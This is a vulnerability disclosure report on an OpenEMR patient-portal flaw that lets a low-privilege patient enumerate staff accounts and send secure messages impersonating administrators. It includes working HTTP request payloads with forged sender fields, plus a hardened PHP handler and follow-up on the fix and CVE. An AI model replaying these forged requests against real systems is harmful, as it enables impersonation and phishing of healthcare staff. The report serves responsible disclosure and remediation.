Missing Authorization Check Allows Impersonated Secure Messages in openemr/openemr
Reported on
Feb 27th 2023
Description
Due to the lack of an authorization check when sending secure messages, an attacker with access to a low-level patient account in the portal can impersonate other users when sending secure messages. This would allow a malicious actor to impersonate high-level users (administrators/doctors) when sending secure messages and can lead to legitimate-looking social engineering and phishing attacks.
Proof of Concept
Step 1. Login to the patient portal using a low-level patient account
Step 2. Using a tool such as Burp Suite, capture the following request and view its response. The response will contain important account information about privileged users and their accounts.
# Request
POST /openemr/portal/messaging/secure_chat.php?action=authusers HTTP/1.1
Host: demo.openemr.io
(...snippet...)
Te: trailers
Connection: close
#Response
HTTP/1.1 200 OK
Server: nginx/1.21.1
Date: Mon, 27 Feb 2023 02:47:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 367
Connection: close
X-Powered-By: PHP/8.0.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
[{"recip_id":"admin","dash":"1","username":"Billy Smith"},{"recip_id":"accountant","dash":"0","username":"Ernie Stent"},{"recip_id":"clinician","dash":"1","username":"Fred Stone"},{"recip_id":"physician","dash":"1","username":"Donna Lee"},{"recip_id":"receptionist","dash":"0","username":"Barbara Wallace"},{"recip_id":"zhportal","dash":"0","username":"Fred Jarvis"}]
Step 3. Now go to the 'My Messages' section and craft a test message. Send this test message and capture the request using Burp.
Step 4. Replace the recipient_id, recipient_name, sender_id, sender_name parameters with information acquired from step 2. For example, send a message from the admin account to another high privileged user.
POST /openemr/portal/messaging/handle_note.php HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=hsQebSDBqentL5pi-I6T5MVvqPNCGTX4d7pODNoKqhoy5-K%2C
(...snippet...)
Content-Length: 255
Origin: https://demo.openemr.io
Referer: https://demo.openemr.io/openemr/portal/messaging/messages.php
(...snippet...)
Connection: close
title=Test&csrf_token_form=a6d7d772289b2d6083009d0dd9d6aab52da81ca5&noteid=&replyid=&recipient_id=physician&recipient_name=Donna+Lee&sender_id=admin&sender_name=Billy+Smith&task=add&inputBody=%3Cp%3EThis+is+a+test.%3C%2Fp%3E%0D%0A&pid=&submit=messages.php
Step 5. Release this altered request and the victim will receive your impersonated secure message. High-level users will receive this message in the "Secure Messages" section even if they do not usually have access to this feature. (A portal icon will appear in the top right corner of their screen)
Impact
An attacker could use this vulnerability to impersonate administrators and high-level users to conduct advanced phishing and social engineering attacks within the application.
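The pattern behind this report, as an added PHP example that is not OpenEMR's code (saveNote(), the $session keys and AuthorizationError are hypothetical names): a message handler that trusts the sender fields in the form, beside a hardened version that binds the sender to the authenticated portal session and validates the recipient against server-side data.

```php
<?php declare(strict_types=1);
// Added example, not OpenEMR's code: the trusting handler this report describes
// beside a hardened one. saveNote(), the $session keys and AuthorizationError are
// hypothetical names.

final class AuthorizationError extends RuntimeException {}
// Vulnerable: sender_id/sender_name are whatever the client posted (PoC step 4).
function handleNoteVulnerable(array $post, callable $saveNote): array
{
    $note = [
        'title'          => $post['title'] ?? '',
        'body'           => $post['inputBody'] ?? '',
        'recipient_id'   => $post['recipient_id'] ?? '',
        'recipient_name' => $post['recipient_name'] ?? '',
        'sender_id'      => $post['sender_id'] ?? '',   // attacker-controlled
        'sender_name'    => $post['sender_name'] ?? '', // attacker-controlled
    ];
    $saveNote($note);
    return $note;
}

// Hardened: identity comes from the session established at login, and the recipient
// must be in the server's own list of users this patient may message. The list the
// browser receives (PoC step 2) is UI data, never authorization.
function handleNoteHardened(array $post, array $session, array $allowedRecipients,
                            callable $saveNote): array
{
    if (empty($session['portal_pid']) || empty($session['portal_username'])) {
        throw new AuthorizationError('no authenticated portal session');
    }
    // Posted sender fields are ignored; a mismatch is worth a log line for detection.
    if (isset($post['sender_id']) && $post['sender_id'] !== (string) $session['portal_pid']) {
        error_log(sprintf('portal messaging: pid %s posted sender_id=%s, ignored',
            $session['portal_pid'], $post['sender_id']));
    }
    $recipient = (string) ($post['recipient_id'] ?? '');
    if (!isset($allowedRecipients[$recipient])) {
        throw new AuthorizationError("recipient '$recipient' not permitted for this patient");
    }
    $note = [
        'title'          => (string) ($post['title'] ?? ''),
        'body'           => (string) ($post['inputBody'] ?? ''),
        'recipient_id'   => $recipient,
        'recipient_name' => $allowedRecipients[$recipient], // server data, not the form
        'sender_id'      => (string) $session['portal_pid'],
        'sender_name'    => (string) $session['portal_username'],
    ];
    $saveNote($note);
    return $note;
}
```

With the hardened handler, the altered request in step 4 is stored under the logged-in patient's own identity, and the mismatch between the posted sender_id and the session leaves a log entry that can be alerted on.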
This is fixed in the master branch at https://github.com/openemr/openemr/commit/3656bc88288957d68ba040cad2e5f9dbd1b607b1
@drew-sec, I am unable to mark this as fixed, since that requires hard-setting a publish date, which I am unable to safely predict. We plan to release OpenEMR 7.0.1 in about 3-4 weeks, which will include this fix. At that time (after the release of OpenEMR 7.0.1), we will then mark this issue as fixed (and publish at that time with a CVE).
Thanks for the report @drew-sec!
Now that 7.0.1 has been released, can we please have the CVE filed for this vulnerability?
Hey @bradymiller, could I please get CVEs filed for the three vulnerabilities that I disclosed for OpenEMR? Thanks!
@admin, could I please have CVEs filed for the three vulnerabilities I reported for this project?
Hi Andrew, the maintainer can assign a CVE once it is marked as fixed & published.